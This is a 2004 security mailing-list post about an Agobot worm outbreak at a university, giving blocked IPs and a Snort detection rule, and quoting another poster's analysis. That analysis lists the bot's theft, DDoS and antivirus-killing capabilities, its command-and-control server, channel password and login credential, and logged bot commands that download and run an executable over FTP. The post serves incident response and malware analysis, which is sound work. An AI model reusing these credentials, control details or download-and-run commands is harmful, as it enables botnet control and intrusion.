RE: Re: Outbreak of a virus on campus

["David Hale" <ddh () mtu edu>]

  We have currently blocked connections to port to/from 7000 on the
following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

  This seems to have contained the spread of the worm within our campus. 
The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
content:"weednet";classtype:bad-unknown; sid:71727; rev:1;)

  Until the block was in place we had shut down around 50 hosts (mainly on
our dorm network) that had been infected with the worm.

  -Dave Hale
   Sr. Security Specialist
   Michigan Technological University

> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller () fidnet com, full-disclosure () lists netsys com
> Subject: RE: [Full-disclosure] Re: Outbreak of a virus on campus
>
> > phatbot?
>
> This one is yet another agobot. Has long list of useful commands
> (included in the end of posting, if someone is interested...),
> polymorph capability, stealth capability -hides its own process
> in memory and binary from listing, capable of updating itself
> via ftp/http, has list of servers for evaluating connection speed,
> steals cdkeys, sniffs a wire, performs ddos, capable installing
> a proxy, sends spam via aol, can install identd, has LONG list
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrievs sysinfo, makes screenshots etc etc etc -
> looks similar to others good household bot's :)
>
> What makes its interesting - its stealth capability and propagation.
> It has following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
>
> When worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joines to password ptotected channel
> #1337, password is heyho. As channel topic is
> .scan.startall, it accepts command and starts
> right away scanning.
>
> I took my trusty irc client and joined to that
> channel by myself. Right away admin gave me those
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe
> %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe
> c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
>
> -----------------------
> commands and parameters
> all commands starts with . (dot)


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html